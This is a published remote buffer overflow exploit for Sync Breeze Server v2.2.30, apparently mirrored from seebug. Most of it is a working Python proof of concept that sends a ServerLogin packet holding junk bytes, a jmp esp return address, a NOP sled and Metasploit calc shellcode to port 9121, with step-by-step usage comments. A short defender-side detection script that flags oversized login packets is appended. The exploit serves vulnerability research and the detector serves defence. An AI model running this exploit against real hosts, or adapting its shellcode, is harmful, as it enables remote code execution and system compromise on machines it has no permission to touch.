Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit

Published: 01 Jul 2014, reported by RootType
Source: seebug (www.seebug.org)

Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit identifie

Code

#!/usr/bin/python

# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely affected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A

### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin." the affected service (syncbrs.exe)
# will crash as the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow /
# execute arbitrary code.
###
# This PoC's usage:
# 1. Verify that the service is running on the remote machine; the default port is 9121.
# 2. Execute syncbreeze.py against the host.
# 3. Check the remote machine's process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privilege escalation attack vector (although I have not verified this yet)

# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave that up to researchers however. 
# Have fun!
###

### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###

import sys,socket

if len(sys.argv) != 2:
    print "[!] Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

about = "=================================================\n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC\n"
about +=  "Author: xsploited security\nURL: http://www.x-sploited.com/\n"
about +=  "Contact: xsploitedsecurity [at] gmail.com\n"
about +=  "=================================================\n"
print about

host = sys.argv[1]
port = 9121 			#default server port, unchangeable (I think)

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c" 
"\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99" 
"\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8" 
"\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0" 
"\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5" 
"\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58" 
"\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb" 
"\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1" 
"\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b" 
"\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34" 
"\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c" 
"\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b" 
"\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab" 
"\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10" 
"\xc4\x73\x5f\x73\xf6\xe0\xe9\x10");

# Begin payload buffer:

packet_header = "\x53\x65\x72\x76\x65\x72\x4C\x6F\x67\x69\x6E\x02"   # "ServerLogin\x02"

junk = "\x90" * 256          # 256-byte junk buffer to reach EIP
eip = "\xFB\xF8\xAB\x71"     # jmp esp (via ws2_32.dll)
nops = "\x90" * 12           # small NOP sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]

packet = packet_header + junk + eip + nops + calc + nops + nops

print "[*] Connecting to " + host + "...\r"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

print "[*] Connected, Sending payload\r"
s.send(packet + "\r\n")
print "[*] Payload sent successfully"
print "[*] Check the results\r"
s.close()
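As an added defender-side example (not part of the original PoC, of seebug, or of Sync Breeze), the following Python 3 script classifies a TCP payload bound for the service using the two facts the advisory above states: the "ServerLogin" command prefix and the 484-byte length limit. The constant names, the LoginVerdict structure, the NOP-run heuristic and the sample payloads are constructed here for illustration; pcap or IDS plumbing is left out.

```python
from dataclasses import dataclass

LOGIN_PREFIX = b"ServerLogin"   # command prefix the vulnerable parser keys on
PREFIX_SEPARATOR = b"\x02"      # byte that follows the prefix in the PoC's header
MAX_SAFE_LENGTH = 484           # advisory: a longer login packet crashes syncbrs.exe

@dataclass
class LoginVerdict:
    is_login: bool    # payload starts with the ServerLogin command prefix
    length: int       # total payload length in bytes
    oversized: bool   # longer than the 484-byte limit from the advisory
    nop_run: int      # longest run of 0x90 bytes after the prefix (sled heuristic)

    @property
    def alert(self) -> bool:
        # The advisory's crash condition is prefix + length; nop_run is only
        # supporting evidence and is not required for an alert.
        return self.is_login and self.oversized

def longest_nop_run(data: bytes) -> int:
    """Length of the longest contiguous run of 0x90 (x86 NOP) bytes."""
    best = run = 0
    for b in data:
        run = run + 1 if b == 0x90 else 0
        best = max(best, run)
    return best

def inspect_login_packet(payload: bytes) -> LoginVerdict:
    """Classify one TCP payload sent to the Sync Breeze service (default port 9121)."""
    is_login = payload.startswith(LOGIN_PREFIX)
    body = payload[len(LOGIN_PREFIX):] if is_login else b""
    if body.startswith(PREFIX_SEPARATOR):
        body = body[1:]
    return LoginVerdict(is_login, len(payload), len(payload) > MAX_SAFE_LENGTH,
                        longest_nop_run(body))

# Constructed sample payloads (not captured traffic): a normal-sized login, an
# oversized one shaped like the PoC's [header][junk] layout, and an unrelated command.
SAMPLE_PAYLOADS = {
    "benign_login": LOGIN_PREFIX + PREFIX_SEPARATOR + b"user\r\n",
    "oversized_login": LOGIN_PREFIX + PREFIX_SEPARATOR + b"\x90" * 500 + b"\r\n",
    "other_command": b"ServerStatus\x02\r\n",
}

def scan(payloads: dict) -> list:
    """Return the names of payloads that should raise an alert."""
    return [name for name, p in payloads.items() if inspect_login_packet(p).alert]
```

Running `scan(SAMPLE_PAYLOADS)` flags only the oversized login; a length-only rule on port 9121 would miss the prefix condition and fire on legitimate bulk transfers.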
